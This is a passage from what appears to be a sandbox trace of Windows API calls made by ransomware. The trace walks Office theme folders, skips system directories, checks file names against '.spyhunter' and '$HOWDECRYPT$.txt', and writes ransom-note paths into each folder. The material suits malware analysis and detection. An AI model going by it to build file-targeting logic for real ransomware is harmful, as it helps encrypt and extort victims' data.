(lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.255] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.255] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.255] lstrlenW (lpString="System Volume Information") returned 25 [0090.255] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 79 [0090.255] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.255] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.255] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.257] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 79 [0090.257] GetProcessHeap () returned 0x2c0000 [0090.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x374b28 [0090.257] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfa8) returned 0x3824f8 [0090.257] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.257] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.257] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\$HOWDECRYPT$.txt") returned 83 [0090.257] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\$HOWDECRYPT$.txt") returned 83 [0090.257] GetProcessHeap () returned 0x2c0000 [0090.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x344838 [0090.257] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfb0) returned 0x3824f8 [0090.257] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.257] lstrcmpiW (lpString1="CANYON", lpString2="Windows") returned -1 [0090.258] lstrlenW (lpString="Windows") returned 7 [0090.258] lstrcmpiW (lpString1="CANYON", lpString2="$Recycle.bin") returned 1 [0090.258] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.258] lstrcmpiW (lpString1="CANYON", lpString2="System Volume Information") returned -1 [0090.258] lstrlenW (lpString="System Volume Information") returned 25 [0090.258] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON") returned 66 [0090.258] lstrcmpW (lpString1="CANYON", lpString2=".") returned 1 [0090.258] lstrcmpW (lpString1="CANYON", lpString2="..") returned 1 [0090.258] GetProcessHeap () returned 0x2c0000 [0090.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.258] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*") returned 68 [0090.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.260] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.260] lstrlenW (lpString="Windows") returned 7 [0090.260] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.260] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.260] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.260] lstrlenW (lpString="System Volume Information") returned 25 [0090.260] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\.") returned 68 [0090.260] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.260] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.260] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.260] lstrlenW (lpString="Windows") returned 7 [0090.260] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.260] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.260] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.260] lstrlenW (lpString="System Volume Information") returned 25 [0090.260] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\..") returned 69 [0090.260] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.260] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.260] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.260] lstrcmpiW (lpString1="CANYON.ELM", lpString2="Windows") returned -1 [0090.261] lstrlenW (lpString="Windows") returned 7 [0090.261] lstrcmpiW (lpString1="CANYON.ELM", lpString2="$Recycle.bin") returned 1 [0090.261] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.261] lstrcmpiW (lpString1="CANYON.ELM", lpString2="System Volume Information") returned -1 [0090.261] lstrlenW (lpString="System Volume Information") returned 25 [0090.261] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 77 [0090.261] StrStrIW (lpFirst="CANYON.ELM", lpSrch=".spyhunter") returned 0x0 [0090.261] lstrcmpW (lpString1="CANYON.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.261] lstrcmpW (lpString1="CANYON.ELM", lpString2="_uninstalling_.png") returned 1 [0090.261] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 77 [0090.261] GetProcessHeap () returned 0x2c0000 [0090.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x374c10 [0090.261] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfb8) returned 0x3824f8 [0090.261] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.261] lstrcmpiW (lpString1="CANYON.INF", lpString2="Windows") returned -1 [0090.261] lstrlenW (lpString="Windows") returned 7 [0090.262] lstrcmpiW (lpString1="CANYON.INF", lpString2="$Recycle.bin") returned 1 [0090.262] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.262] lstrcmpiW (lpString1="CANYON.INF", lpString2="System Volume Information") returned -1 [0090.262] lstrlenW (lpString="System Volume Information") returned 25 [0090.262] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 77 [0090.262] StrStrIW (lpFirst="CANYON.INF", lpSrch=".spyhunter") returned 0x0 [0090.262] lstrcmpW (lpString1="CANYON.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.262] lstrcmpW (lpString1="CANYON.INF", lpString2="_uninstalling_.png") returned 1 [0090.262] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 77 [0090.262] GetProcessHeap () returned 0x2c0000 [0090.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x374cf8 [0090.262] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfc0) returned 0x3824f8 [0090.262] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.262] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.262] lstrlenW (lpString="Windows") returned 7 [0090.262] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.262] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.262] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.262] lstrlenW (lpString="System Volume Information") returned 25 [0090.262] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 78 [0090.262] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.262] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.262] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.263] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 78 [0090.263] GetProcessHeap () returned 0x2c0000 [0090.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x374de0 [0090.263] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfc8) returned 0x3824f8 [0090.263] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.263] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.263] lstrlenW (lpString="Windows") returned 7 [0090.263] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.263] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.263] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.263] lstrlenW (lpString="System Volume Information") returned 25 [0090.263] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 79 [0090.263] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.263] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.263] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.263] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 79 [0090.263] GetProcessHeap () returned 0x2c0000 [0090.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x374ec8 [0090.263] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfd0) returned 0x3824f8 [0090.263] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.263] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.264] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\$HOWDECRYPT$.txt") returned 83 [0090.264] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\$HOWDECRYPT$.txt") returned 83 [0090.264] GetProcessHeap () returned 0x2c0000 [0090.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x344928 [0090.264] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfd8) returned 0x3824f8 [0090.264] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.265] lstrcmpiW (lpString1="CAPSULES", lpString2="Windows") returned -1 [0090.265] lstrlenW (lpString="Windows") returned 7 [0090.265] lstrcmpiW (lpString1="CAPSULES", lpString2="$Recycle.bin") returned 1 [0090.265] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.265] lstrcmpiW (lpString1="CAPSULES", lpString2="System Volume Information") returned -1 [0090.265] lstrlenW (lpString="System Volume Information") returned 25 [0090.265] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES") returned 68 [0090.265] lstrcmpW (lpString1="CAPSULES", lpString2=".") returned 1 [0090.265] lstrcmpW (lpString1="CAPSULES", lpString2="..") returned 1 [0090.265] GetProcessHeap () returned 0x2c0000 [0090.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.265] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*") returned 70 [0090.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.266] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.266] lstrlenW (lpString="Windows") returned 7 [0090.266] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.266] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.266] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.266] lstrlenW (lpString="System Volume Information") returned 25 [0090.266] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\.") returned 70 [0090.266] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.266] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.266] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.266] lstrlenW (lpString="Windows") returned 7 [0090.266] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.266] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.266] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.274] lstrlenW (lpString="System Volume Information") returned 25 [0090.274] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\..") returned 71 [0090.274] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.277] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.277] lstrcmpiW (lpString1="CAPSULES.ELM", lpString2="Windows") returned -1 [0090.277] lstrlenW (lpString="Windows") returned 7 [0090.277] lstrcmpiW (lpString1="CAPSULES.ELM", lpString2="$Recycle.bin") returned 1 [0090.277] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.277] lstrcmpiW (lpString1="CAPSULES.ELM", lpString2="System Volume Information") returned -1 [0090.277] lstrlenW (lpString="System Volume Information") returned 25 [0090.277] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 81 [0090.277] StrStrIW (lpFirst="CAPSULES.ELM", lpSrch=".spyhunter") returned 0x0 [0090.277] lstrcmpW (lpString1="CAPSULES.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.277] lstrcmpW (lpString1="CAPSULES.ELM", lpString2="_uninstalling_.png") returned 1 [0090.277] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 81 [0090.277] GetProcessHeap () returned 0x2c0000 [0090.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344928 [0090.278] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfd0) returned 0x3824f8 [0090.278] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.278] lstrcmpiW (lpString1="CAPSULES.INF", lpString2="Windows") returned -1 [0090.278] lstrlenW (lpString="Windows") returned 7 [0090.278] lstrcmpiW (lpString1="CAPSULES.INF", lpString2="$Recycle.bin") returned 1 [0090.278] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.278] lstrcmpiW (lpString1="CAPSULES.INF", lpString2="System Volume Information") returned -1 [0090.278] lstrlenW (lpString="System Volume Information") returned 25 [0090.278] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 81 [0090.278] StrStrIW (lpFirst="CAPSULES.INF", lpSrch=".spyhunter") returned 0x0 [0090.278] lstrcmpW (lpString1="CAPSULES.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.278] lstrcmpW (lpString1="CAPSULES.INF", lpString2="_uninstalling_.png") returned 1 [0090.278] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 81 [0090.278] GetProcessHeap () returned 0x2c0000 [0090.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x343fc8 [0090.278] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfd8) returned 0x3824f8 [0090.278] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.278] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.278] lstrlenW (lpString="Windows") returned 7 [0090.278] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.278] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.278] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.278] lstrlenW (lpString="System Volume Information") returned 25 [0090.278] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 80 [0090.278] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.278] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.278] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 80 [0090.279] GetProcessHeap () returned 0x2c0000 [0090.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x344a18 [0090.279] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfe0) returned 0x3824f8 [0090.279] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.279] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.279] lstrlenW (lpString="Windows") returned 7 [0090.279] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.279] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.279] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.279] lstrlenW (lpString="System Volume Information") returned 25 [0090.279] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 81 [0090.279] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.279] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.279] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 81 [0090.279] GetProcessHeap () returned 0x2c0000 [0090.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344b08 [0090.279] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfe8) returned 0x3824f8 [0090.279] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.279] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.279] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\$HOWDECRYPT$.txt") returned 85 [0090.280] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\$HOWDECRYPT$.txt") returned 85 [0090.280] GetProcessHeap () returned 0x2c0000 [0090.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354908 [0090.280] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xff0) returned 0x3824f8 [0090.280] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.280] lstrcmpiW (lpString1="CASCADE", lpString2="Windows") returned -1 [0090.280] lstrlenW (lpString="Windows") returned 7 [0090.280] lstrcmpiW (lpString1="CASCADE", lpString2="$Recycle.bin") returned 1 [0090.280] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.280] lstrcmpiW (lpString1="CASCADE", lpString2="System Volume Information") returned -1 [0090.280] lstrlenW (lpString="System Volume Information") returned 25 [0090.280] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE") returned 67 [0090.280] lstrcmpW (lpString1="CASCADE", lpString2=".") returned 1 [0090.280] lstrcmpW (lpString1="CASCADE", lpString2="..") returned 1 [0090.280] GetProcessHeap () returned 0x2c0000 [0090.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.280] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*") returned 69 [0090.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.294] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.294] lstrlenW (lpString="Windows") returned 7 [0090.294] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.294] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.295] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.295] lstrlenW (lpString="System Volume Information") returned 25 [0090.295] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\.") returned 69 [0090.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.295] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.295] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.295] lstrlenW (lpString="Windows") returned 7 [0090.295] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.295] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.295] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.295] lstrlenW (lpString="System Volume Information") returned 25 [0090.295] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\..") returned 70 [0090.295] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.295] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.295] lstrcmpiW (lpString1="CASCADE.ELM", lpString2="Windows") returned -1 [0090.295] lstrlenW (lpString="Windows") returned 7 [0090.295] lstrcmpiW (lpString1="CASCADE.ELM", lpString2="$Recycle.bin") returned 1 [0090.295] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.295] lstrcmpiW (lpString1="CASCADE.ELM", lpString2="System Volume Information") returned -1 [0090.295] lstrlenW (lpString="System Volume Information") returned 25 [0090.295] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 79 [0090.295] StrStrIW (lpFirst="CASCADE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.295] lstrcmpW (lpString1="CASCADE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.295] lstrcmpW (lpString1="CASCADE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.296] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 79 [0090.296] GetProcessHeap () returned 0x2c0000 [0090.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x374fb0 [0090.296] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xff8) returned 0x3824f8 [0090.296] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.296] lstrcmpiW (lpString1="CASCADE.INF", lpString2="Windows") returned -1 [0090.296] lstrlenW (lpString="Windows") returned 7 [0090.296] lstrcmpiW (lpString1="CASCADE.INF", lpString2="$Recycle.bin") returned 1 [0090.296] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.296] lstrcmpiW (lpString1="CASCADE.INF", lpString2="System Volume Information") returned -1 [0090.296] lstrlenW (lpString="System Volume Information") returned 25 [0090.296] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF") returned 79 [0090.296] StrStrIW (lpFirst="CASCADE.INF", lpSrch=".spyhunter") returned 0x0 [0090.296] lstrcmpW (lpString1="CASCADE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.296] lstrcmpW (lpString1="CASCADE.INF", lpString2="_uninstalling_.png") returned 1 [0090.296] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.INF") returned 79 [0090.296] GetProcessHeap () returned 0x2c0000 [0090.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x375098 [0090.296] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1000) returned 0x3824f8 [0090.296] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.296] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.296] lstrlenW (lpString="Windows") returned 7 [0090.296] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.297] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.297] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.297] lstrlenW (lpString="System Volume Information") returned 25 [0090.297] wnsprintfW 